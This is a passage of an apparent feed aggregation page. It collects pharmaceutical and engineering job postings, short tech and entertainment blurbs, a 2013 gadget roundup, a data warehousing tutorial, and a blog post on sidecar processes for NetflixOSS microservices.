(1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to submit to a background investigation, including verification of your past employment, criminal history, and educational background + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is a different kind of pharmaceutical company, a privately held company with the ability to have an innovative and long term view. Our focus is on scientific discoveries that improve patients' lives and we equate success as a pharmaceutical company with the steady introduction of truly innovative medicines. Boehringer Ingelheim is the largest privately held pharmaceutical corporation in the world and ranks among the world's 20 leading pharmaceutical corporations. At Boehringer Ingelheim, we are committed to delivering value through innovation. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Roxane Inc., Roxane Laboratories Inc., Boehringer Ingelheim Chemicals, Boehringer Ingelheim Vetmedica Inc. Ben Venue Laboratories Inc. and Boehringer Ingelheim Fremont, Inc. is an equal opportunity employer. Minority/Female/Protected Veteran/Person with a Disability Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment background investigations and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Beef_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _178703_
          (USA-GA-DULUTH) Technical Manager - Swine        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is one of the world’s top 20 pharmaceutical companies and operates globally with approximately 50,000 employees. Since our founding in 1885, the company has remained family-owned and today we are committed to creating value through innovation in three business areas including human pharmaceuticals, animal health and biopharmaceutical contract manufacturing. Since we are privately held, we have the ability to take an innovative, long-term view. Our focus is on scientific discoveries and the introduction of truly novel medicines that improve lives and provide valuable services and support to patients and their families. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. We are also deeply committed to our communities and our employees create and engage in programs that strengthen the neighborhoods where we live and work. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Animal Health USA, Inc., Merial Barceloneta, LLC and Boehringer Ingelheim Fremont, Inc. is an equal opportunity and affirmative action employer committed to a culturally diverse workforce. All qualified applicants will receive consideration for employment without regard to race; color; creed; religion; national origin; age; ancestry; nationality; marital, domestic partnership or civil union status; sex, gender identity or expression; affectional or sexual orientation; disability; veteran or military status, including protected veteran status; domestic violence victim status; atypical cellular or blood trait; genetic information (including the refusal to submit to genetic testing) or any other characteristic protected by law. Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment verifications and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Swine_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _176908_
          (USA-GA-DULUTH) Technical Manager - Equine        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is one of the world’s top 20 pharmaceutical companies and operates globally with approximately 50,000 employees. Since our founding in 1885, the company has remained family-owned and today we are committed to creating value through innovation in three business areas including human pharmaceuticals, animal health and biopharmaceutical contract manufacturing. Since we are privately held, we have the ability to take an innovative, long-term view. Our focus is on scientific discoveries and the introduction of truly novel medicines that improve lives and provide valuable services and support to patients and their families. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. We are also deeply committed to our communities and our employees create and engage in programs that strengthen the neighborhoods where we live and work. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Animal Health USA, Inc., Merial Barceloneta, LLC and Boehringer Ingelheim Fremont, Inc. is an equal opportunity and affirmative action employer committed to a culturally diverse workforce. All qualified applicants will receive consideration for employment without regard to race; color; creed; religion; national origin; age; ancestry; nationality; marital, domestic partnership or civil union status; sex, gender identity or expression; affectional or sexual orientation; disability; veteran or military status, including protected veteran status; domestic violence victim status; atypical cellular or blood trait; genetic information (including the refusal to submit to genetic testing) or any other characteristic protected by law. Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment verifications and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Equine_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _176466_
          Distributed computing in JavaScript        

We’ve heard about the idea of using browsers as distributed computing nodes for a couple years now. It’s only recently, with the race towards faster JavaScript engines in browsers like Chrome that this idea seems useful. [Antimatter15] did a proof of concept JavaScript implementation for reversing hashes. Plura Processing uses a Java applet to do distributed processing. Today, [Ilya Grigorik] posted an example using MapReduce in JavaScript. Google’s MapReduce is designed to support large dataset processing across computing clusters. It’s well suited for situations where computing nodes could go offline randomly (i.e. a browser navigates away from your site). He …read more


          The Dude Designs to take us for a ‘Teddy Bears Picnic’        
Premiering at FrightFest in London on the 28th August, Teddy Bears Picnic is a proof of concept horror short from Tom Hodge – aka The Dude Designs – the poster artist behind artwork for films such Hobo with A Shotgun (2011), The Innkeepers (2011), The Heat (2013), WolfCop (2014), The Other Side of The Door […]
          Converus a Finalist for the 2017 Red Herring Top 100 North America Award        

Converus has been honored with one of the tech industry’s most prestigious awards. The company is a finalist for Red Herring’s Top 100 North America award. Finalists are among the most innovative and brightest private ventures in North America. Their place among the tech elite has been determined by Red Herring’s editorial team, during a many months-long process that considers criteria including disruptive impact, proof of concept, financial performance, market footprint and quality of management.

The post Converus a Finalist for the 2017 Red Herring Top 100 North America Award appeared first on Converus EyeDetect.


          [Screencast] KMix QML Applet, the real one        
When I started writing my last blog post, exactly two weeks ago, I never imagined that I would receive so many positive feedbacks and responses1 for a project that, as I’ve always restated, was just an proof of concept and nothing more. Anyways that experiment (and the act of sharing it with the community) leaded, […]
          Digital Engineering Manager - San Marcos        
Aethercomm designs and manufactures high power RF and microwave amplifiers for use in CW and pulsed applications. Aethercomm covers the frequency range from DC to 40 GHz. Aethercomm products are used in radar systems, electronic warfare systems, communication systems and test and measurement applications. Aethercomm also designs and manufactures transmitters, transceivers and RF/microwave subsystems and systems. Aethercomm's design and manufacturing facilities are located in San Marcos, CA in San Diego County. We are currently looking for a highly motivated Digital Engineering Manager. In this position, you will direct a small group of Electrical Engineers. Also, participate in the full development cycle from conception to final testing of signal processing and data acquisition PCB cards. Specifically, gather requirements and contribute to the design of circuit boards, implement high speed parallel processing, Xilinx FPGA development using VHDL, Xilinx System Generator, and Xilinx Integrated Software Environment (ISE). Develop embedded DSP applications utilizing FIR filters and FFT modules, develop and evaluate testing methodologies, and test prototype to verify performance consistent with established specifications. You will help drive technology into products and keep engineers aware of relevant new technology. This position will be responsible for proof of concept and design changes using MATLAB and Simulink. Develop signal-processing design to increase amplifier linearization for the project. Develop algorithm to improve the performance of the system. Develop software design, including specification, analysis, design, implementation coding, interface development, debugging, testing, documentation and support. Support hardware in making design needed for analog filtering, noise reduction, lower power consumption, control unit design, software interface, chip evaluation, testing unit design. Design test equipments and user interfaces for raw data collection, production testing which will assist algorithm development, performance testing and maintain databases. A Bachelor's degree (B. S.) from a four-year college or university in the electronics or computer engineering, and 5 years of related experience, or a Master's degree and 3 years of related experience. Excellent written and verbal communication skills are needed to work with suppliers and other staff members. Candidates must be motivated team players. US Citizenship required. Excellent benefit package including health, dental, vision, vacation and 401k plan. To learn more about us, please visit our website at [link removed] Please submit resume and cover letter along with salary requirements.
          Consumer Reports pulls Microsoft Surface recommendation, citing high breakage rates        
 The Surface line has been a surprising hit for Microsoft in recent years. What many regarded as little more than proof of concept for Windows 10 has become a leader in the two-in-one tablet category in its own right. But according to a new survey conducting by Consumer Reports, the devices have proven far more unreliable than much of the competition. In fact, things are so bad, the publication… Read More
          Grading The LEGO Batman Movie: Animal Logic and FilmLight        
Following successful collaborations on The Matrix, Legends of the Guardians, and Happy Feet, Sydney's Animal Logic worked with Warner Bros on The LEGO Movie from pitch to proof of concept to post. Animal Logic has gone even further on the latest LEGO animated feature, The LEGO Batman Movie, where th
          2013: Five gizmos that rocked        

Have we really invented most of what there was to invent? Unlikely. But big new products have gotten fewer and far between. And in 2013, various big tech launches landed with varying thuds. Both hardware (HP's Chromebook 11, Nintendo's Wii U console, the Surface tablet) and software.

BlackBerry's much-awaited BB10 operating system was launched in January, but fizzled out, crushed by unexciting, overpriced products. Windows 8, launched the previous year, flopped, and in an ever-so-unrelated move, Microsoft's Steve Ballmer announced that he would step down next year.

Yet there were some great gadgets this year: Many new-and-improved ones, and a few all-new products. Here's my pick of five that rocked:

THE iPad Air

The Air shows us what 2013 was mostly about: improvements. If Apple's new iPhones were totally underwhelming, it made up with the iPad Air.

This is an overhauled iPad that looks like a big iPad Mini. It's the lightest 10-inch tablet around. It's super-thin, though at 7.5 mm it's beaten by the FTV-model-like Sony Xperia Tablet Z (6.9 mm).

Sadly, the iPad Air is way overpriced, at Rs.51,900 in India for the 32 GB cellular model. And it retains its 5 Mp camera, instead of moving up to the iPhone 5's 8 Mp. But it's stunning (complete with Retina display), packs iWorks and other great software, and works superbly well - retaining its 8-10 hour charge despite the smaller battery.

THE SMARTWATCH

"Wearables" in the form of smartwatches were the rage in tech shows. The crowd-funded PEBBLE was first off the mark, backed by 69,000 people pledging $10 million. It sold about 100,000 smartwatches.

And then Samsung launched the GALAXY GEAR. This watch runs apps, handles voice calls and text messages, and takes pictures and videos, working as a companion to a few Galaxy smartphones. That's limiting, but it's still the first smartwatch from a big brand, and Samsung quickly claimed 800,000 shipments (many were returned).

It's very early days. This gear is expensive at Rs.23,000, has poor battery life, glitchy software, and very few apps. It's in many "flops of 2013" lists, but it's too early for that. Just wait for the Gear 2, expected next March, and many more.

NOKIA LUMIA 1020

Smartphone cameras have gotten very good over the past two years. There are impressive cameras in the iPhone 5 (8 Mp) and Samsung Galaxy S4 (13 Mp). To prove that it isn't about megapixels, the HTC One has a great 4 Mp, low-light camera.

The big leap forward was the Nokia Lumia 1020. Its whopping 41 Mp camera could have set off another megapixel rat race, but it isn't about the megapixels behind that Carl Zeiss lens, but how well they're used. Even with low-resolution everyday photos.

Or you can take high-res photos and later crop and zoom digitally without decreasing image quality. And the 1020 now supports the uncompressed RAW digital format preferred by pro photographers.

As smartphone, overall, the Lumia 1020 is far from the top. It runs Windows, which is still rather challenged on the apps front, even with Instagram and other popular apps added. But if you want a great camera with a phone, or if you're a photographer looking for a backup camera and a backup phone, this is it.

THE MACBOOK AIR

Apple's 2012 Air, which I'm writing this on, was already the sexiest notebook around. What the 2013 Air did was to take this stunning device and double its battery life to 12 hours for the 13-inch model, with higher performance and a lower price. Inside it, Intel's thrifty new Haswell chip helped a lot.

At about Rs.62,000, the 11-inch Air is now great value. Especially with all the free software: Pages, Numbers and Keynote, included. No Microsoft Office required.

Sure, for that price you might squeeze in more specs into a Windows notebook, but that's missing the point. The Air makes a statement like no other on this side of the Rs.100,000-mark, and it works superbly (even with Windows, if you should choose to install that). It's fast, and uses solid-state storage. The MacBook Air is the benchmark other notebook vendors will still be looking to in 2014.

GOOGLE GLASS

This is the converged future: eyewear meets personal computing, Mission Impossible meets real life.

You wear it like spectacles, and see a smartphone-like display in front of your eye. You can speak to it, telling it to do things. Next year, it should be integrated with regular glasses and sunglasses.

It's a product from Google X, the search giant's mystery division that's worked on other future tech such as driverless cars. Glass is not a mass-manufactured product yet, but a proof of concept-now being tested among selected buyers, in its Explorer Edition ($1,500).

Glass should reach store shelves some time in 2014 -- changing the wearables market forever.


          Turn your room into a giant screen with Microsoft’s Illumiroom        
Standing as a proof of concept, IllumiRoom is a bit like ambient lighting on crack, for gamers. It's a really smart projector that turns your external gaming environment into part of the video game's map.
                  
What is Data Warehouse...


As Defined by Bill Inmon : A data warehouse is a subject-oriented, integrated, time-variant and non-volatile collection of data in support of management's decision making process.


What does it mean in the real world or in terms of real data.


Collection of operational/analytically data from multiple sources and create a database system. Then Business hit this database and create a report which help them to take business decision. 


Today we have traditional dataware house where we store historical data, but this trend is going to be changed in near future. Where business ask for near real time data to take quick decision and provide business solution. 

Before going to the future trends, lets discuss the dataware house concept.
Several concepts are of particular importance to data warehousing. They are discussed in detail in this section.



Dimensional Data Model: Dimensional data model is most often used in data warehousing systems. This is different from the 3rd normal form, commonly used for transactional (OLTP) type systems. As you can imagine, the same data would then be stored differently in a dimensional model than in a 3rd normal form model.
To understand dimensional data modeling, let's define some of the terms commonly used in this type of modeling:
Dimension: A category of information. For example, the time dimension.
Attribute: A unique level within a dimension. For example, Month is an attribute in the Time Dimension.
Hierarchy: The specification of levels that represents relationship between different attributes within a dimension. For example, one possible hierarchy in the Time dimension is Year → Quarter → Month → Day.
Fact Table: A fact table is a table that contains the measures of interest. For example, sales amount would be such a measure. This measure is stored in the fact table with the appropriate granularity. For example, it can be sales amount by store by day. In this case, the fact table would contain three columns: A date column, a store column, and a sales amount column.
Lookup Table: The lookup table provides the detailed information about the attributes.
A dimensional model includes fact tables and lookup tables. Fact tables connect to one or more lookup tables, but fact tables do not have direct relationships to one another. Dimensions and hierarchies are represented by lookup tables. Attributes are the non-key columns in the lookup tables.


Slowly Changing Dimension: The "Slowly Changing Dimension" problem is a common one particular to data warehousing. In a nutshell, this applies to cases where the attribute for a record varies over time.
Type 1: The new record replaces the original record. No trace of the old record exists.
Type 2: A new record is added into the customer dimension table. Therefore, the customer is treated essentially as two people.
Type 3: The original record is modified to reflect the change.

Conceptual, Logical, and Physical Data Model:


Conceptual Model Design

Conceptual Model Design


Logical Model Design

Logical Model Design


Physical Model Design

Physical Model Design


Data Integrity: Data integrity refers to the validity of data, meaning data is consistent and correct. In the data warehousing field, we frequently hear the term, "Garbage In, Garbage Out." If there is no data integrity in the data warehouse, any resulting report and analysis will not be useful.


If any organisation want to build a dataware house then what are the key thing to keep in mind.

1> Information Cycle:-
         A data warehouse project relies as much on business involvement as it does on the delivery team. The need for communication and involvement is best shown in a diagram that we have called the 'Information Cycle'.
         The information that is produced by the system should not only enable the business users to see data but should encourage business actions (e.g. revising pricing policies, change in credit agreements, customer communications), that in turn lead to new data being produced.It is the new data that provides much of the value to the business. This data becomes a visible part of the customer lifecycle that will in turn lead to the ability to report on and exploit more information.

The system will always continue to be fed from the core operational data sources so that the historic knowledge of the customer base continues to grow.

Lastly, an on-going communication cycle of the business needs (requirements) and the delivery of new capabilities will ensure that the system will remain in line with changes in the organisation as the business grows and develops.



2> Initial Phases to Delivery:-


There are two initial phases to the delivery of the a data warehouse and these are business requirements capture and data model design
.
Business Requirements Capture
     In order to develop a system such as this there are many phases that the project must progress. The initial phases of requirement capture are encompassed within these four documents.


Often an organisation will have undertaken many such activities and as such this set of requirements should be created through a process of consolidating the existing requirements and supplementing them with any additional ones that have been uncovered during the production of the document.


Data Model Design
    In simple terms the data model can be seen as a framework into which data can be entered. This is a way to represent the information that is to be performant, integrated, flexible and trusted.


The business requirements provide a way of testing whether the data model meets current, short and medium term requirements of the information.


3> Boundaries of Objectives :-



There is no way that a perfect solution to the business requirement can be developed and, as such, boundaries need to exist on the definitions of ‘performant’, ‘integrated’, ‘flexible’ and ‘trusted’.


These boundaries have been scoped at a high level and are detailed below. If the business feels strongly about any particular issue raised here then this need to be added to these documents as specific requirements.


Performance


A data warehouse system is not normally described in the same terms as an operational data entry system where times are described in seconds between screens etc. There are two major factors in performance, the first is the time taken to design and build report, and the second is the time taken to run the report or queries.


The design and build of a report will depend upon the development of an agreed SLA between the delivery team and the business, it is suggested that any given report should not normally take more than one week to produce. The number of new report requests will have a direct effect upon the ability to deliver. However, with the eventual introduction of additional tools there should be an overall increase in the delivery of timely information to the business.


The time to run a report or query against the system is a more difficult performance issue. As a rule any reports which are required regularly can be produced each day/week/month dependant upon requirements or even tuned to run in very responsive times upon request. However there will always be a number of ad hoc reporting requests that will take considerable time to produce, these will need to be addressed on a case by case basis. When queries are being run directly by users, response times will vary wildly based upon the question being asked. Often a simple question to articulate in words can take a considerable time to run in a data warehouse. Over time the warehouse can be tuned to cope with the most common types of queries.


Integration


Integration is the ability to bring data together from many sources. The model must be capable of supporting the important data items from many sources and be able to combine them together in a meaningful fashion. Thus two systems that each hold a record of customer information should produce one record within the solution which is the sum of the information from both systems.


The result of such integration is that questions can be asked of the system that correlate information from many sources that today will be done by manual processing and re-keying information into a spreadsheet. The business requirements are used to identify which information is required and therefore allow the development team to identify the systems and the priorities for integration.



Flexibility


The flexibility of the solution is based around its ability to deal with change. There are some givens:


• The organisation will continue to trade both with individuals and with organisations.


• The trade will continue to be in the area of current market place, although the types of products/technology that are used will differ and consequently the billing of the product will also differ.


• There will be new methods of payment and differing payment plans to suit customers needs. All of these are factored in where known and should be designed to be easy to add when they are discovered in the future.


• It is also assumed that the organisation will continue to market themselves but that the method (e.g. sales channels or regions etc.) of both sales and marketing will change over time and use different multiple concurrent media to carry on that exercise. The solution should be able to utilise new organisational structures and communication media quickly when implemented.


• No assumption is made about where the organisation will operate and therefore the possibility of US (dollar) and European (Euro) trading needs to be explicitly incorporated.


• Given these boundaries on flexibility the aim is to be able to change the system in line with the way in which the organisation develops its business model. Current and planned business requirement articulated will allow the testing of the model to meet these goals.


Trusted


A trusted system is one in which the quality and timeliness of data that is loaded is understood. This does not imply that information is perfect, but that the imperfections are known and quantified in such a way that the business can determine the value of the information that it is looking at.


Quality is made up of a number of factors such as cleaning the data, knowing where data is missing, and how much data has been lost and identifying human factors in the input of the system that store information by the way it is used rather than explicit data characteristics. There are many such elements that must be considered and presented as a ‘confidence factor’ to the user.


Timeliness is the ability to present data as information to the user in an acceptable timeframe after it has been created. This can not be defined as ‘3 minutes later’ but varies in context. For example an engineer may record ‘job completion’ on a daily or weekly basis. Timeliness in this context may be a day or two later. Other events may be required in much shorter time scales.


These factors lead to an ‘auditability’ of information that allows analysts to trace back information in the solution, through any changes it has undergone to its origin.




Future Trends in Dataware House:-


The future will bring a level of complexity and business importance that will raise the bar for all of us. The real-time implementation of a business action, decision or change of direction that is based on the results of strategic data analysis is now the reality. The data issues surrounding this trend aren't getting any easier or smaller. Combine the need for real-time data warehousing and increased data size and complexity, and we set the stage for a new type of warehouse – the "virtual" enterprise data warehouse. This virtual DW or private hub for both operational and informational needs will begin to drive new demands on the ability of organizations to assimilate vast data assets stored in merged/acquired companies or divisional enterprise resource planning (ERP) and legacy environments. The time needed to integrate all the operational systems will make the traditional method of data integration impractical. This intersection of Web channels and data warehousing has the potential to become the standard architecture for large, complex organizations.



It’s the most sophisticated form of data management in the IT house, and it’s about to get even bigger. In fact, data warehousing is now labeled “mission-critical” by Gartner analysts. The data warehouse is expected to remain the key component of the IT infrastructure, “one of the largest—if not the largest—information repository in the enterprise.” Here are the top 9 data warehousing trends of the future.


1. Optimization and Performance
Data warehousing will use optimization and performance as a differentiator in addition to focusing on the issue of optimizing storage for warehouses via compression and usage-based data placement strategies.


2. Data Warehouse Appliances
Appliances are the next big thing – mostly because of their simplicity. The vendor builds and certifies the configuration, balancing hardware, software and services for a predictable performance. Appliances also install rapidly. They also can speed delivery by avoiding time-consuming hardware balancing. 


3. The Intensive POC
Gartner recommends that POCs (proof of concept) use as much real source-system extracted data (SSED) from the operational systems as possible, while performing the POC with as many users as possible, creating a data warehouse workload that approaches that of the environment to be used in production.


4. Data Warehouse Mixed Workloads
There are six workloads that are delivered by the data warehouse platform: bulk/batch load, basic reporting, basic online analytical processing (OLAP), real-time/continuous load, data mining and operational BI. Warehouses delivering all six workloads need to be assessed for predictability of mixed workload performance as failing to plan for mixed workloads will lead to increased administration costs over time, as volume and additional workloads are added, potentially leading to major sustainability issues.


5. The Resurgence of Data Marts
Data mart usage will increase throughout 2011 and 2012 due to their effectiveness in optimizing the warehouse environment by offloading part of the workload to the data mart.


6. Column-Store DBMSs (Database Management System)
Column-store DBMSs generally exhibit faster query response than traditional, row-based systems and can serve as excellent data mart platforms, and even as a main data warehouse platform.


7. In-Memory DBMSs (Database Management System)
Not only do in-memory DBMSs deliver fast query responses, they introduce a higher probability that analytics and transactional systems can share the same database. Analytic data models, master data approaches and data services within a middle tier will begin to emerge as the dominant approach, forcing more traditional row-based vendors to adapt to column approaches and in-memory simultaneously.


8. Data Warehouse as a Service and Cloud
According to Gartner, in 2011, data warehouse as a service comes in two "flavors" — software as a service (SaaS) and outsourced data warehouses. Data warehouse in the cloud is primarily an infrastructure design option as a data model must still be developed, an integration strategy must be deployed and BI user access must be enabled and managed. Private clouds are an emerging infrastructure design choice for some organizations in supporting their data warehouse and analytics.


9. Using an Open-Source DBMS to Deploy the Data Warehouse
Gartner states that this particular trend still remains in the experimental stage. At this point, open-source warehouses are rare and usually smaller than traditional ones and also generally require a more manual level of support. However, some solutions are optimized specifically for data warehousing.













          NTT Com Starts Japan’s 1st eSIM Proof of Concept for MVNOs        
none
          Integrators '20 under 40' 2015—Scott Ranger        
10/13/2015
Martha Entwistle

Scott Ranger, 34

VP Operations, CONTAVA

Edmonton, Alberta

“My impression of security from a distance was that it was fairly simplistic, I found it was quite the contrary after spending some time with CONTAVA,” said Scott Ranger.

Ranger came to systems integration firm CONTAVA four years ago as a project manager following 14 years in the telecom industry. He was surprised to learn how technology was being used. “It’s pretty amazing what’s being done in the security world,” he said.

Although it comes with “barriers and challenges,” the technology Ranger finds the most interesting is analytics. “We see more and more use of and higher adoption rates coming through proof of concept. We’re working down the path to validate the strength and viability of analytics.”

The right analytic technology in the right application better leverages the platform and investment,” he said. “It’s really about getting greater ROI.”

To get more talented young people involved in security, the industry needs to take a real interest in local and community colleges. CONTAVA has an organized outreach effort with local schools.

“You need to take the opportunity to inform students what the industry is all about. If you don't you’ll lose the best students to large IT or telecoms. These students need to know that in security there’s the opportunity to work with all the world-renowned names. Security touches all platforms—which can be more exciting that focusing your career on just one.”


          A NetflixOSS sidecar in support of non-Java services        
In working on supporting our next round of IBM Cloud Service Fabric service tenants, we found that the service implementers came from very different backgrounds.  Some were skilled in Java, some Ruby and others were C/C++ focused and therefore their service implementations were just as diverse.  Given the size of the team of the services we're on-boarding and timeframe for going public, recoding all of these services to use NetflixOSS Java libraries that bring the operational excellence (like Archaius, Karyon, Eureka, etc) seemed pretty unlikely.

For what it is worth, we faced a similar challenge in earlier services (mostly due to existing C/C++ applications) and we created what was called a "sidecar".  By sidecar, what I mean is a second process on each node/instance that did Cloud Service Fabric operations on behalf of the main process (the side-managed process).  Unfortunately those sidecars all went off and created one-offs for their particular service.  In this post, I'll describe a more general sidecar that doesn't force users to have these one-offs.

Sidenote:  For those not familiar with sidecars, think of the motorcycle sidecar below.  Snoopy would be the main process with Woodstock being the sidecar process.  The main work on the instance would be the motorcycle (say serving your users' REST requests).  The operational control is the sidecar (say serving health checks and management plane requests of the operational platform).


Before we get started, we need to note there are multiple types of sidecars.  Predominantly there are two main types of sidecars.  There are sidecars that manage durable and or storage tiers.  These sidecars need to manage things that other sidecars do not (like joining a stateful ring of servers, or joining a set of slaves and discovering masters, or backup and recovery of data).  Some sidecars that exist in this space are Priam (for Cassandra) and Exhibitor (for Zookeeper).  The other type is for managing stateless mid-tier services like microservices.  An example of this is AirBNB's Synapse and Nerve.  You'll see that in the announcement of Synapse and Nerve on AirBNB's blog that they are trying to solve some (but not all) of the issues I will mention in this blog post.

What are some things that a microservice sidecar could do for a microservice?

1. Service discovery registration and heartbeat

This registration with service discovery would have to happen only after the sidecar detects the side-managed process as ready to receive requests.  This isn't necessarily the same as if the instance is "healthy" as an instance might be healthy well before it is ready to handle requests (consider an instance that needs to pre-warm caches, etc.).  Also, all dynamic configuration of this function (where and if to register) should be considered.

2.  Health check URL

Every instance should have a health check url that can communicate out of band the health of an instance.  The sidecar would need to query the health of the side-managed process and expose this url on behalf of the side-managed process.  Various systems (like auto scaling groups, front end load balancers, and service discovery queries) would query this URL and take sick instances out of rotation.

3.  Service dependency load balancing

In a NetflixOSS based microservice, routing can be done intelligently based upon information from service discovery (Eureka) via smart client side load balancing (Ribbon).  Once you move this function out of the microservice implementation, as AirBNB noted as well, it is likely unneeded and problematic in some cases to move back to centralized load balancing.  Therefore it would be nice if the sidecar would perform load balancing on behalf of the side-managed process.  Note that Zuul (on instance in the sidecar) could fill this role in NetflixOSS.  In AirBNB's stack, the combination of service discovery and this item is done through Synapse.  Also, all dynamic configuration of this function (states of routes, timeouts, retry strategy, etc) should be considered.

One other area to consider here (especially in the NetflixOSS space) would be if the sidecar should provide for advanced devops filters in load balancing that go beyond basic round robin load balancing.  Netflix has talked about the advantages of Zuul for this in the front/edge tier, but we could consider doing something in between microservices.

4.  Microservice latency/health metrics

Being able to have operational visibility into the error rates on calls to dependent services as well as latency and overall state of dependencies is important to knowing how to operate the side-managed process.  In NetflixOSS by using the Hystrix pattern and API, you can get such visibility through the exported Hystrix streams.  Again, Zuul (on instance in the sidecar) can provide this functionality.

5.  Eureka discovery

We have found service implementation in IBM that already have their own client side load balancing or cluster technologies.  Also, Netflix has talked about other OSS systems such as Elastic Search.  For these systems it would be nice if the sidecar could provide a way to expose Eureka discovery outside of load balancing.  Then the client could ingest the discovery information and use it however it felt necessary.  Also, all dynamic configuration of this function should be considered.

6.  Dynamic configuration management

It would nice if the sidecar could expose to the side-managed process dynamic configuration.  While I have mentioned the need to have previous sidecar functions items dynamically configured, it is important that the side-managed process configuration to be considered as well.  Consider the case where you want the side-managed process to use a common dynamic configuration management system but all it can do is read from property files.  In NetflixOSS this is managed via Archaius but this requires using the NetflixOSS libraries.

7.  Circuit breaking for fault tolerance to dependencies

